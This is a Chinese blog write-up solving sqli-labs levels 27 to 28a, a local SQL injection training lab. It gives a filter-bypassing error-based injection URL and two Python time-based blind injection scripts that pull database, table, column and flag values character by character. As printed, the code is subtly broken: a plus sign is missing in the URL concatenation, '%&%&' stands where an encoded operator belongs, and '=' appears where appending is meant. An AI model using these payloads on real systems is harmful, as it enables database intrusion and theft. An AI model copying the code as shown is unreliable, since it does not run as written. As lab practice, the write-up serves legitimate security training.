前言:
本关为sql-labs系列less27、less27a、less28以及less28a,此系列持续更新,前面的关卡可以查看我前面的文章,如有错误的地方欢迎师傅指正。
正文:
less27:
本关过滤掉了union和select,不过解决办法也很简单,前面过滤or的时候使用双写就可以了,不过这一关要嵌套三个select(使用双写依然会完全过滤掉,我没有看源码具体也不清楚)。这里使用报错注入,由于查看数据库可以避免使用select,所以直接放一下查询表的步骤,看图:
成功爆出表名,看一下脚本:
http://localhost/sqli-labs-master/Less-27/?id=1’||extractvalue(1,concat(’~’,(seselselectectlect(group_concat(table_name))from(information_schema.tables)where(table_schema=‘security’))))||1='1
考察点就是select那里,值得一提的是这一关的or没有进行过滤,后面的步骤就跟前面的一样了,不再赘述。
less27a:
这一关跟less26a差别不大,也同样是没有错误回显,只是比26a多过滤了一个select,直接放脚本:
代码语言:javascript复制import requests
import time
import datetime
url = 'http://localhost/sqli-labs-master/Less-27a/?id=1"'
def get_dbname():
db_name = ''
for i in range(10):
for k in range(32,127):
payload = '%&%&if(ascii(substr(database(),%d,1))=%d,sleep(2),1)%&%&1="1'%(i,k)
time1 = datetime.datetime.now()
res = requests.get(url payload)
time2 = datetime.datetime.now()
difference = (time2-time1).seconds
if difference > 1:
db_name = chr(k)
print("数据库名为->" db_name)
get_dbname()
def get_table():
tables_name = ''
for i in range(40):
for k in range(32,127):
payload = '%&%&if(ascii(substr((seselselectectlect(group_concat(table_name))from(information_schema.tables)where(table_schema="security")),%d,1))=%d,sleep(2),1)%&%&1="1'%(i,k)
time1 = datetime.datetime.now()
res = requests.get(url payload)
time2 = datetime.datetime.now()
difference = (time2-time1).seconds
if difference > 1:
tables_name = chr(k)
print("所有表名为->" tables_name)
get_table()
def get_columns():
columns_name = ''
for i in range(10):
for k in range(32,127):
payload = '%&%&if(ascii(substr((selselselectectect(group_concat(column_name))from(information_schema.columns)where(table_name="flag")),%d,1))=%d,sleep(2),1)%&%&1="1'%(i,k)
time1 = datetime.datetime.now()
res = requests.get(url payload)
time2 = datetime.datetime.now()
difference = (time2-time1).seconds
if difference > 1:
columns_name = chr(k)
print("所有字段名为->" columns_name)
get_columns()
def get_flag():
flag = ''
for i in range(40):
for k in range(32,127):
payload = '%&%&if(ascii(substr((selselselectectect(flag)from(flag)),%d,1))=%d,sleep(2),1)%&%&1="1'%(i,k)
time1 = datetime.datetime.now()
res = requests.get(url payload)
time2 = datetime.datetime.now()
difference = (time2-time1).seconds
if difference > 1:
flag = chr(k)
print("flag为->" flag)
get_flag()效果图:
差别不大就不再详细讲解。
less28:
直接放less28关的,我没有看其他的讲解,自己直接做了,不知道为啥less28比less27a还简单,less27a是双引号,而less28是单引号,而且还没有过滤select(我看的其他博客里面别的师傅说后台过滤了union select这两个一起用才会过滤),所以直接跟前面一样用脚本跑就可以了:
代码语言:javascript复制import requests
import time
import datetime
url = "http://localhost/sqli-labs-master/Less-28/?id=1'"
def get_dbname():
db_name = ''
for i in range(10):
for k in range(32,127):
payload = "%&%&if(ascii(substr(database(),%d,1))=%d,sleep(2),1)%&%&1='1"%(i,k)
time1 = datetime.datetime.now()
res = requests.get(url payload)
time2 = datetime.datetime.now()
difference = (time2-time1).seconds
if difference > 1:
db_name = chr(k)
print("数据库名为->" db_name)
get_dbname()
def get_tables():
tables_name = ''
for i in range(40):
for k in range(32,127):
payload = "%&%&if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),%d,1))=%d,sleep(2),1)%&%&1='1"%(i,k)
time1 = datetime.datetime.now()
res = requests.get(url payload)
time2 = datetime.datetime.now()
difference = (time2-time1).seconds
if difference > 1:
tables_name = chr(k)
print("所有表名为->" tables_name)
get_tables()
def get_columns():
columns_name = ''
for i in range(10):
for k in range(32,127):
payload = "%&%&if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))=%d,sleep(2),1)%&%&1='1"%(i,k)
time1 = datetime.datetime.now()
res = requests.get(url payload)
time2 = datetime.datetime.now()
difference = (time2-time1).seconds
if difference > 1:
columns_name = chr(k)
print("所有的字段名为->" columns_name)
get_columns()
def get_flag():
flag = ''
for i in range(40):
for k in range(32,127):
payload = "%&%&if(ascii(substr((select(flag)from(flag)),%d,1))=%d,sleep(2),1)%&%&1='1"%(i,k)
time1 = datetime.datetime.now()
res = requests.get(url payload)
time2 = datetime.datetime.now()
difference = (time2-time1).seconds
if difference > 1:
flag = chr(k)
print("flag为->" flag)
get_flag()less28a:
本关依然使用bool时间盲注,测试发现使用脚本跟less26a完全一样,详情可以查看less26a
完工,感谢支持!
